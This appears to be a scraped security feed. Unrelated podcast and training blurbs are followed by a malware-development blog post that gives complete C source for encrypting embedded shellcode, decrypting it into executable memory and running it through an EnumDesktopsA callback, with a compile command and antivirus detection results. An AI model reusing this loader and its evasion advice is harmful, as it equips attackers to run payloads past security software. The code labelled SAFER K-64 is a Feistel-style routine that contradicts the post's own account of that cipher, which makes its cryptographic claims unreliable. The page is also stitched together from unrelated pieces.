Fortifying the Chain: A Proven Strategy for Supply Chain Defense
The post Fortifying the Chain: A Proven Strategy for Supply Chain Defense appeared first on Horizon3.ai.
Accelerate your DevOps journey with OffSec. Build secure, scalable, and efficient software delivery pipelines through real-world training.
The post Infrastructure Automation and Defense: Introducing DevSecOps Essentials appeared first on OffSec.
Today on Cyber Work, we are talking operational technology, or OT, security with guest Robin Berthier of Network Perception. From his earliest studies to his time as an academic researcher, Berthier has dedicated his career to securing the intersection between operational technology and network security, with some pretty imaginative solutions to show for it. In today’s episode, Berthier explains why modern OT security means thinking more about the mechanics of the machinery than the swiftness of the software solutions, the big conversation that infrastructure and ICS security need to have about nation-state attackers (and finally are having!), and Berthier's best piece of career advice turns into some excellent thoughts on the importance of maintaining your network… and I don’t mean routing and switching!
0:00 - Industrial control systems cybersecurity
1:54 - How Robin Berthier got into tech
3:38 - Majoring in cybersecurity
4:55 - Intrusion detection systems
9:18 - Mechanical and cybersecurity tools
12:33 - Launching Network Perception
17:03 - Current state of ICS and OT infrastructure
20:24 - Cyberattacks on industrial control systems
28:35 - Skills needed to work in industrial control systems
35:19 - Where are ICS security jobs?
36:39 - Getting into local OT systems
37:55 - Skills gaps in ICS
39:21 - Best piece of career advice
41:01 - Cultivating a work network
43:28 - What is Network Perception?
45:27 - Learn more about Robin Berthier
45:58 - Outro
– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
Learn about the role of cybersecurity training in compliance. Discover how OffSec’s training can contribute to a strong compliance posture.
The post The Role of Cybersecurity Training in Compliance appeared first on OffSec.
Horizon3.ai Principal Security SME Stephen Gates and JTI Cybersecurity Principal Consultant Jon Isaacson discuss:
– What JTI does to validate things like access control, data loss prevention, ransomware protection, and intrusion detection approaches.
– How #pentesting and red team exercises allow orgs to validate the effectiveness of their security controls.
– Why offensive operations work best to discover and mitigate exploitable vulnerabilities in their client’s infrastructures.
The post Fireside Chat: Horizon3.ai and JTI Cybersecurity appeared first on Horizon3.ai.
Learn about the importance of cybersecurity compliance, most common cybersecurity compliance frameworks and how to navigate their complexities.
The post Cybersecurity Compliance: Understanding Regulatory Frameworks appeared first on OffSec.
Outsmart evolving cyber threats with Threat Hunting Essentials. This hands-on training path builds expertise in threat actor analysis, advanced hunting techniques, and data analysis.
The post Proactive Threat Detection: Introducing Threat Hunting Essentials appeared first on OffSec.
Stay ahead of hackers! OffSec Cyber Ranges train your team on the latest exploits for a proactive, adaptable defense.
The post The Race Against the Hackers: How the OffSec Cyber Ranges Keep You Ahead appeared first on OffSec.
Today on Cyber Work, our deep-dive into manufacturing and operational technology (OT) cybersecurity brings us to the problem of endpoint security. Tom Molden, CIO of Global Executive Engagement at Tanium, has been grappling with these problems for a while. We talk about his early, formative tech experiences (pre-Windows operating system!), his transformational move from fiscal strategy and implementation into his first role as chief information officer, and talk through the interlocking problems that come from connected manufacturing devices and the specific benefits and challenges to be found in strategizing around the endpoints. All of the endpoints.
0:00 - Manufacturing and endpoint security
1:44 - Tom Molden's early interest in computers
4:06 - Early data usage
6:26 - Becoming a CIO
10:29 - Difference between a CIO and CISO
14:57 - Problems for manufacturing companies
18:45 - Best CIO problems to solve in manufacturing
22:51 - Security challenges of manufacturing
26:00 - The scope of endpoint issues
33:27 - Endpoints in manufacturing security
37:12 - How to work in manufacturing security
39:29 - Manufacturing security skills gaps
41:54 - Gain manufacturing security work experience
43:41 - Tom Molden's best career advice received
46:26 - What is Tanium?
47:58 - Learn more about Tom Molden
48:34 - Outro
Learn about the importance of clear and effective communication skills in cybersecurity.
The post Communication Skills in Cybersecurity appeared first on OffSec.
Infosec and Cyber Work Hacks are here to help you pass the CCNA exam! For today’s Hack, Wilfredo Lanz, Infosec bootcamp instructor in charge of Cisco’s CCNA certification, walks us through four sample CCNA questions, going through each answer and discounting the wrong ones with explanations, allowing you to reach the right answer in a logical and stress-free way. And the only way you’re going to see it is by staying right here for this Cyber Work Hack!
0:00 - CCNA exam sample questions
1:31 - Different types of CCNA exam questions
3:34 - First CCNA exam sample question
8:34 - Second CCNA exam sample question
13:52 - Third CCNA exam sample question
20:47 - Fourth CCNA exam sample question
25:22 - Infosec CCNA boot camp practice exam
27:04 - Advice for CCNA exam day
28:46 - Outro
Learn more about the CCNA: https://www.infosecinstitute.com/training/ccna/
﷽
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on trying to evade AV engines by encrypting the payload with another algorithm: SAFER. As usual, while exploring various crypto algorithms, I decided to check what would happen if we apply this one to encrypt/decrypt the payload.
SAFER (Secure And Fast Encryption Routine) is a symmetric block cipher designed by James Massey. SAFER K-64 specifically refers to the variant with a 64-bit key size. It’s notable for its nonproprietary nature and has been incorporated into some products by Cylink Corp.
SAFER K-64 operates as an iterated block cipher, meaning the same function is applied for a certain number of rounds. Each round utilizes two 64-bit subkeys, and the algorithm exclusively employs operations on bytes. Unlike DES, SAFER K-64 is not a Feistel network.
As a practical example, here is the step-by-step flow of the SAFER-64 round function as implemented here:
```c
// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];
// SAFER-64 encryption rounds
for (i = 0; i < ROUNDS; i++) {
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31); // rotate left by 1 bit
    L ^= (T + R);
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31); // rotate left by 1 bit
    R ^= (T + L);
}
// update the data block with the encrypted values
data_ptr[0] = L;
data_ptr[1] = R;
```
So, the encryption function looks like this:
```c
void safer_encrypt(unsigned char *data, unsigned char *key) {
    unsigned int *data_ptr = (unsigned int *)data;
    unsigned int *key_ptr = (unsigned int *)key;
    unsigned int L, R, T;
    int i;

    L = data_ptr[0];
    R = data_ptr[1];
    for (i = 0; i < ROUNDS; i++) {
        T = R ^ key_ptr[i % 4];
        T = (T << 1) | (T >> 31);
        L ^= (T + R);
        T = L ^ key_ptr[(i % 4) + 4];
        T = (T << 1) | (T >> 31);
        R ^= (T + L);
    }
    data_ptr[0] = L;
    data_ptr[1] = R;
}
```
What about decryption logic? The decryption process is not much different from encryption:
```c
// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];
// SAFER-64 decryption rounds, walked in reverse order
for (i = ROUNDS - 1; i >= 0; i--) {
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31); // rotate left by 1 bit
    R ^= (T + L);
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31); // rotate left by 1 bit
    L ^= (T + R);
}
// update the data block with the decrypted values
data_ptr[0] = L;
data_ptr[1] = R;
```
Correspondingly, the SAFER-64 decryption function looks like this:
```c
void safer_decrypt(unsigned char *data, unsigned char *key) {
    unsigned int *data_ptr = (unsigned int *)data;
    unsigned int *key_ptr = (unsigned int *)key;
    unsigned int L, R, T;
    int i;

    L = data_ptr[0];
    R = data_ptr[1];
    for (i = ROUNDS - 1; i >= 0; i--) {
        T = L ^ key_ptr[(i % 4) + 4];
        T = (T << 1) | (T >> 31);
        R ^= (T + L);
        T = R ^ key_ptr[i % 4];
        T = (T << 1) | (T >> 31);
        L ^= (T + R);
    }
    data_ptr[0] = L;
    data_ptr[1] = R;
}
```
The full source code for my main logic (“malicious” payload encryption) looks like this (hack.c):
```c
/*
 * hack.c - encrypt and decrypt shellcode via SAFER. C++ implementation
 * @cocomelonc
 * https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define BLOCK_SIZE 8 // 64 bits
#define ROUNDS 6

// encrypt one 8-byte block in place; the key is read as 8 32-bit subkey words
void safer_encrypt(unsigned char *data, unsigned char *key) {
    unsigned int *data_ptr = (unsigned int *)data;
    unsigned int *key_ptr = (unsigned int *)key;
    unsigned int L, R, T;
    int i;

    L = data_ptr[0];
    R = data_ptr[1];
    for (i = 0; i < ROUNDS; i++) {
        T = R ^ key_ptr[i % 4];
        T = (T << 1) | (T >> 31);
        L ^= (T + R);
        T = L ^ key_ptr[(i % 4) + 4];
        T = (T << 1) | (T >> 31);
        R ^= (T + L);
    }
    data_ptr[0] = L;
    data_ptr[1] = R;
}

// decrypt one 8-byte block in place by running the rounds in reverse order
void safer_decrypt(unsigned char *data, unsigned char *key) {
    unsigned int *data_ptr = (unsigned int *)data;
    unsigned int *key_ptr = (unsigned int *)key;
    unsigned int L, R, T;
    int i;

    L = data_ptr[0];
    R = data_ptr[1];
    for (i = ROUNDS - 1; i >= 0; i--) {
        T = L ^ key_ptr[(i % 4) + 4];
        T = (T << 1) | (T >> 31);
        R ^= (T + L);
        T = R ^ key_ptr[i % 4];
        T = (T << 1) | (T >> 31);
        L ^= (T + R);
    }
    data_ptr[0] = L;
    data_ptr[1] = R;
}

int main() {
    // the round function reads key_ptr[0..7], i.e. 32 bytes of key material;
    // the 16-byte "meowmeowmeowmeow" key is repeated twice so that subkeys 4..7
    // are not read from past the end of the buffer
    unsigned char key[] = "\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77"
                          "\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77";
    unsigned char my_payload[] =
        "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
        "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
        "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
        "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
        "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
        "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
        "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
        "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
        "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
        "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
        "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
        "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
        "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
        "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
        "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
        "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
        "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
        "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
        "\x2e\x2e\x5e\x3d\x00";

    int len = sizeof(my_payload);
    // round the length up to a whole number of 8-byte blocks
    int pad_len = (len + BLOCK_SIZE - 1) & ~(BLOCK_SIZE - 1);
    unsigned char padded[pad_len];
    memset(padded, 0x90, pad_len); // pad the tail with NOPs
    memcpy(padded, my_payload, len);

    // encrypt the padded shellcode block by block (ECB)
    for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
        safer_encrypt(&padded[i], key);
    }

    printf("encrypted:\n");
    for (int i = 0; i < sizeof(padded); i++) {
        printf("\\x%02x", padded[i]);
    }
    printf("\n\n");

    // decrypt the padded shellcode
    for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
        safer_decrypt(&padded[i], key);
    }

    printf("decrypted:\n");
    for (int i = 0; i < sizeof(padded); i++) {
        printf("\\x%02x", padded[i]);
    }
    printf("\n\n");

    // copy the decrypted shellcode into RWX memory and run it via the EnumDesktopsA callback
    LPVOID mem = VirtualAlloc(NULL, sizeof(padded), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(mem, padded, pad_len);
    EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
    return 0;
}
```
As you can see, first of all, before encrypting, we pad the payload to a whole number of blocks with NOP (\x90) instructions.
As usual, I used the meow-meow payload (the my_payload byte string in the source above).
For simplicity, I run the shellcode via the EnumDesktopsA callback trick.
Let’s see this trick in action. Compile our “malware”:
```bash
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
```
And run it on the victim’s machine (Windows 10 x64 v1903 in my case):
As you can see, our decrypted shellcode is modified: the \x90 padding is working as expected.
Calculate the entropy and upload to VirusTotal:
```bash
python3 entropy.py -f ./hack.exe
```
24 of 70 AV engines detect our file as malicious, as expected.
As you can see, this algorithm encrypts the payload quite well, but the file is still detected by many AV engines and so is poorly suited for bypassing them; most likely this is because a well-studied method of launching the payload is used. If you apply anti-debugging, anti-disassembly and anti-VM tricks, the result will be better.
The Singapore government has considered using SAFER with a 128-bit key for various applications due to its lack of patent, copyright, or other restrictions, making it an attractive choice for widespread adoption.
I hope this post spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers’ arsenal.
SAFER
Malware and cryptography 1
source code in github
This is a practical case for educational purposes only.
Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine